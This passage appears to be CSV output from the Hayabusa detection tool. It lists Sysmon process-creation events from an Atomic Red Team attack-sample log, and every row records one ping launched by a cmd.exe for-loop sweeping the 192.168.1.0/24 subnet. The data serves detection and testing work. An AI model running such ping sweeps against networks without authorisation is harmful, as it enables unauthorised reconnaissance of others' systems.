+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:50.047 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:56.507 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:03.031 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:09.515 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:16.026 
